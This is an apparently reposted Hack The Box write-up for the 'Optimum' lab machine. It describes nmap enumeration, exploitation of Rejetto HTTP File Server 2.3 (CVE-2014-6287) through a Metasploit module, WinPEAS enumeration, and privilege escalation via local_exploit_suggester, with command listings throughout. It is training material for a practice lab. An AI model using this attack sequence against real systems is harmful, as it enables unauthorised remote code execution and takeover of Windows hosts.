## https://sploitus.com/exploit?id=2AABDE5F-37AA-5FB5-BD10-1E8C9BF5F23D
# Optimum
---
# Optimum โ Hack The Box Writeup
## Overview
In this machine, the objective is to gain initial access to a Windows host by exploiting a vulnerable web service and then escalate privileges to obtain the administrator flag.
The attack path involved:
* Service enumeration
* Exploitation of **Rejetto HTTP File Server 2.3**
* Initial access via **Metasploit**
* Privilege escalation using **WinPEAS** and **Metasploit post-exploitation modules**
---
# Reconnaissance
We start with a full TCP port scan to identify exposed services.
```bash
nmap -Pn -n -p- --min-rate 5000 -T4
```
The scan reveals **port 80** open.
Next, we perform a service and version scan.
```bash
nmap -p80 -sSCV --min-rate 5000 -T4
```
The result identifies the following service:
```
HttpFileServer 2.3
```
This service corresponds to **Rejetto HTTP File Server**, a lightweight file-sharing web server.
---
# Vulnerability Identification
After researching the detected version, we discover a known vulnerability:
```
CVE-2014-6287
```
This vulnerability allows **remote code execution** due to improper input sanitization.
---
# Exploitation
To exploit the vulnerability, we use **Metasploit**.
Start Metasploit:
```bash
msfconsole -q
```
Search for the appropriate module:
```bash
search rejetto
```
Load the exploit module:
```bash
use exploit/windows/http/rejetto_hfs_exec
```
Configure the required options:
```bash
set RHOSTS
set RPORT
set LHOST
set LPORT
run
```
Once executed, the exploit provides a **Meterpreter session** on the target machine.
---
# Initial Access
With the obtained Meterpreter session, we navigate the filesystem to retrieve the **user flag**.
```bash
cd
cat user.txt
whoami
```
The command output shows that we are logged in as:
```
kostas
```
Since this user does not have administrative privileges, we proceed with **privilege escalation**.
---
# Privilege Escalation Enumeration
To identify potential privilege escalation vectors, we upload **WinPEAS**, a well-known Windows privilege escalation enumeration tool.
```bash
upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe
```
We then execute it:
```bash
shell
.\wp.exe
```
The output reveals useful information, including credentials associated with the user **kostas**.
---
# Privilege Escalation
After reviewing possible escalation vectors, we use the Metasploit module:
```
local_exploit_suggester
```
Load the module:
```bash
use post/multi/recon/local_exploit_suggester
```
Configure the session:
```bash
set SESSION
run
```
This module suggests possible local exploits that can be used to escalate privileges.
After successfully escalating privileges, we obtain a shell with administrative rights.
Verification:
```bash
shell
whoami
```
---
# Administrator Access
Once administrative privileges are obtained, we navigate to the Administrator directory to retrieve the **root flag**.
```bash
cd \Users\Administrator
dir
cd Desktop
dir
type root.txt
```
---
# Key Takeaways
This machine demonstrates several important penetration testing concepts:
* Proper **service enumeration** is critical to identifying vulnerable software.
* Publicly known vulnerabilities such as **CVE-2014-6287** can lead to immediate remote code execution.
* Tools like **WinPEAS** help identify privilege escalation opportunities in Windows environments.
* **Metasploit post-exploitation modules** can accelerate the privilege escalation process.